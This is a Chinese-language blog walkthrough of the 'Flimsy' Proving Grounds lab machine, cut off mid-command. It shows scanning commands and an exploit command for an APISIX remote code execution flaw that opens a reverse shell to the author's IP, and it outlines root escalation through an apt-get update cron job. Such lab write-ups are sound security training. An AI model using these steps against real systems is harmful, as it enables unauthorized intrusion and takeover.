發表文章

目前顯示的是有「Flimsy」標籤的文章

Proving Grounds Practice : Flimsy Walkthrough

圖片
 Proving Grounds Practice : Flimsy Walkthrough Foothole (立足點 ) : APISIX RCE 漏洞利用 PE ( 提權 ) : cat /etc/crontab 發現 apt-get update 利用執行 apt-get update 時執行 reverse shell 注意事項 :  Exploit Code 網址寫法,最後要加上 / apt-update 利用學習 第一步 Rustscan, └─$ rustscan -a 192.168.156.220 --scripts none --ulimit 5000 | tee rustscan snmp filtered 沒戲,└─$ sudo nmap -sU -p 161 192.168.156.220 | tee snmp nmap,└─$ sudo nmap -sCV -A -p 22,80,3306,43500 192.168.156.220 | tee nmap 22 SSH 80 nginx/1.18.0 3306 MySQL 43500 OpenResty web app server、http-server-header: APISIX/2.8 80 / 下方的 Send 測試了沒有用會顯示 405 Not Allowed 80 /robots.txt whatweb 80 gobuster 80,沒東西 43500 / searchsploit APISIX 發現一個 RCE 50829,版本顯示 2.12.1(靶機的版本是 2.8) 看了一下 Exploit-DB 版本 2.8 有在範圍內,內容看來沒啥好改的 跑一下看看,有告知使用方式 [!] Usage   : ./apisix-exploit.py <target_url> <lhost> <lport> 跑跑看 └─$ python3 50829.py http://192.168.156.220:43500 192.168.45.224 4444 結果 GG 後來再網址最後面加上 / 成功 └─$ python3 50829.py http://192.168.156.220:435...